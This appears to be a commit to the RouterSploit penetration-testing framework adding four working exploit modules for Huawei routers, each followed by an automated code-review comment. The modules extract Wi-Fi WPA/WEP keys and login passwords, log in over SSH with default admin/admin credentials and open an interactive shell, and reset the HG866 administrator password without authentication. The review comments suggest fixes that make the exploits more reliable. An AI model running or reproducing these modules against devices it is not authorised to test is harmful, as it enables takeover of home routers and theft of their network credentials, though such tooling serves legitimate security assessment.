Commit 89477dc4 by Marcin Bury

Adding multiple huawei exploits.

parent 5b917907
import re
from routersploit import (
exploits,
print_status,
print_error,
print_success,
print_table,
http_request,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Huawei E5331 Information Disclosure vulnerability.
If the target is vulnerable it allows to read sensitive information."
"""
__info__ = {
'name': 'Huawei E5331 Info Disclosure',
'description': 'Module exploits information disclosure vulnerability in Huawei E5331 MiFi Mobile Hotspot devices. If the target is vulnerable it allows to read sensitive information.',
'authors': [
'J. Greil https://www.sec-consult.com', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/32161/',
],
'devices': [
'Huawei E5331 MiFi Mobile Hotspot',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
opts = ['WifiAuthmode', 'WifiBasicencryptionmodes', 'WifiWpaencryptionmodes', 'WifiWepKey1', 'WifiWepKey2',
'WifiWepKey3', 'WifiWepKey4', 'WifiWepKeyIndex', 'WifiWpapsk', 'WifiWpsenbl', 'WifiWpscfg', 'WifiRestart']
def run(self):
url = "{}:{}/api/wlan/security-settings".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
res = []
for option in self.opts:
regexp = "<{}>(.+?)</{}>".format(option, option)
value = re.findall(regexp, response.text)
if value:
res.append((option, value[0]))
if len(res):
print_success("Found sensitive information!")
print_table(("Option", "Value"), *res)
@mute
def check(self):
url = "{}:{}/api/wlan/security-settings".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
res = []
for option in self.opts:
regexp = "<{}>(.+?)</{}>".format(option, option)
value = re.findall(regexp, response.text)
if value:
res.append(value)
if len(res):
return True # target is vulnerable
return False # target is not vulnerable
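Review bot: `run()` prints nothing on either failure path: it returns `False` when `http_request` yields `None` and falls through silently when none of the `opts` tags match, so the operator cannot tell an unreachable host from a patched one. Add `print_error("Exploit failed - could not retrieve security settings")` on both paths and drop the `return False`, since `run()` returns nothing on every other path. `run()` and `check()` repeat the same request-and-regex loop; a shared private helper returning the matched pairs would keep the two in step. The values passed to `print_table` include the WPA PSK and WEP keys, so session logs from an assessment have to be handled as credentials.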
import re
from routersploit import (
exploits,
print_status,
print_error,
print_success,
http_request,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Huawei HG530 and HG520b Password Disclosure vulnerability.
If the target is vulnerable it allows to read credentials."
"""
__info__ = {
'name': 'Huawei HG530 & HG520b Password Disclosure',
'description': 'Module exploits password disclosure vulnerability in Huawei HG530 and HG520b devices. If the target is vulnerable it allows to read credentials.',
'authors': [
'Fady Mohamed Osman (@fady_osman)', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/37424/',
],
'devices': [
'Huawei Home Gateway HG530',
'Huawei Home Gateway HG520b',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
url = "{}:{}/UD/?5".format(self.target, self.port)
headers = {'SOAPACTION': '"urn:dslforum-org:service:UserInterface:1#GetLoginPassword"',
'Content-Type': 'text/xml; charset="utf-8"',
'Expect': '100-continue'}
data = ("<?xml version=\"1.0\"?>"
"<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
"<s:Body>"
"<m:GetLoginPassword xmlns:m=\"urn:dslforum-org:service:UserInterface:1\">"
"</m:GetLoginPassword>"
"</s:Body>"
"</s:Envelope>")
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return
r = re.compile('<NewUserpassword>(.*?)</NewUserpassword>')
m = r.search(response.text)
if m:
print_success("Password has been found")
print_info("Password: {}".format(m.group(1)))
else:
print_error("Exploit failed - could not find password")
@mute
def check(self):
url = "{}:{}/UD/?5".format(self.target, self.port)
headers = {'SOAPACTION': '"urn:dslforum-org:service:UserInterface:1#GetLoginPassword"',
'Content-Type': 'text/xml; charset="utf-8"',
'Expect': '100-continue'}
data = ("<?xml version=\"1.0\"?>"
"<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
"<s:Body>"
"<m:GetLoginPassword xmlns:m=\"urn:dslforum-org:service:UserInterface:1\">"
"</m:GetLoginPassword>"
"</s:Body>"
"</s:Envelope>")
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return False # target is not vulnerable
r = re.compile('<NewUserpassword>(.*?)</NewUserpassword>')
m = r.search(response.text)
if m:
return True # target is vulnerable
return False # target not vulnerable
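Review bot: `run()` calls `print_info("Password: ...")` on the success path, but `print_info` is not in this file's `from routersploit import (...)` list, so a match would raise `NameError` right after "Password has been found" is printed. Add `print_info,` to the import list, or use `print_success` for that line as well. `check()` repeats the URL, headers and SOAP body from `run()` verbatim; building them once in a private helper would stop the two copies from drifting apart. The recovered password is written to the console in clear, so session logs from an assessment have to be handled as credentials.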
import paramiko, termios, tty, sys, select, socket
from routersploit import (
exploits,
print_status,
print_error,
print_success,
mute,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Huawei HG630a and HG630a-50 devices. If the target is vulnerable it is possible to authenticate through SSH service.
"""
__info__ = {
'name': 'Huawei HG630a Default Credentials',
'description': 'Module exploits default SSH credentials Huawei HG630a and HG630a-50 devices. If the target is vulnerable it is possible to authenticate through SSH service.',
'authors': [
'Murat Sahin (@murtshn)', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/38663/',
],
'devices': [
'Huawei HG630a',
'Huawei HG630a-50',
],
}
target = exploits.Option('', 'Target IP address') # target address
user = exploits.Option('admin', 'Default username to log in with')
password = exploits.Option('admin', 'Default password to log in with')
def run(self):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(self.target, 22, timeout=5, username=self.user, password=self.password)
except paramiko.ssh_exception.SSHException:
print_error("Exploit failed - cannot log in with credentials {} / {}".format(self.user, self.password))
return
else:
print_success("SSH - Successful authentication")
chan = ssh.invoke_shell()
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
while(True):
r, w, e = select.select([chan, sys.stdin], [], [])
if(chan in r):
try:
x = unicode(chan.recv(1024))
if(len(x) == 0):
sys.stdout.write('\r\nExiting...\r\n')
break
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
if(sys.stdin in r):
x = sys.stdin.read(1)
if(len(x) == 0):
break
chan.send(x)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
return
@mute
def check(self):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(self.target, 22, timeout=5, username=self.user, password=self.password)
except paramiko.ssh_exception.SSHException:
return False # target is not vulnerable
else:
return True # target is vulnerable
return False # target not vulnerable
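Review bot: Both `run()` and `check()` catch only `paramiko.ssh_exception.SSHException` around `ssh.connect(...)`, so a refused or timed-out TCP connection, which surfaces as `socket.error`/`socket.timeout`, escapes as a traceback instead of a "not vulnerable" result. Widen the handler to `except (paramiko.ssh_exception.SSHException, socket.error):`; `socket` is already imported. `check()` never calls `ssh.close()`, which leaves an authenticated session open on the device after a successful probe, and its trailing `return False` is unreachable after the `try/except/else`. `unicode(chan.recv(1024))` in `run()` ties the module to Python 2 and can raise on non-ASCII bytes from the device, so an explicit decode with an error policy would be safer.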
import re
from routersploit import (
exploits,
print_status,
print_error,
print_success,
http_request,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Huawei HG866 Password Change vulnerability.
If the target is vulnerable it allows to change administration password.
"""
__info__ = {
'name': 'Huawei HG866 Password Cahnge',
'description': 'Module exploits password change vulnerability in Huawei HG866 devices. If the target is vulnerable it allows to change administration password.',
'authors': [
'hkm', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/19185/',
],
'devices': [
'Huawei HG866',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
password = exploits.Option('routersploit', 'Password value to change admin account with')
def run(self):
if self.check():
url = "{}:{}/html/password.html".format(self.target, self.port)
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = {'psw': self.password,
'reenterpsw': self.password,
'save': 'Apply'}
print_status("Sending password change request")
response = http_request(method="POST", url=url, headers=headers, data=data)
if response.status_code == 200:
print_success("Administrator's password has been changed to {}".format(self.password))
else:
print_error("Exploit failed - could not change password")
else:
print_error("Exploit failed - target seems to be not vulnerable")
@mute
def check(self):
url = "{}:{}/html/password.html".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and "psw" in response.text and "reenterpsw" in response.text:
return True # target is vulnerable
return False # target not vulnerable
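Review bot: `run()` dereferences `response.status_code` without the `None` check that `check()` has, so a dropped connection on the POST raises `AttributeError`; guard it with `if response is None:` followed by a `print_error(...)` and `return`. An HTTP 200 on the POST does not show that the password was changed, so the success message can be wrong, and in `check()` the test `"psw" in response.text` is redundant because `"reenterpsw"` already contains it, which means the check only shows that a page with that field name is served. The module changes device state and the `password` option defaults to the fixed value `routersploit`, so a device left at that well-known value stays exposed after the test; the option description should say that the previous password cannot be restored through the module. The `'name'` string also has a typo, `Cahnge`.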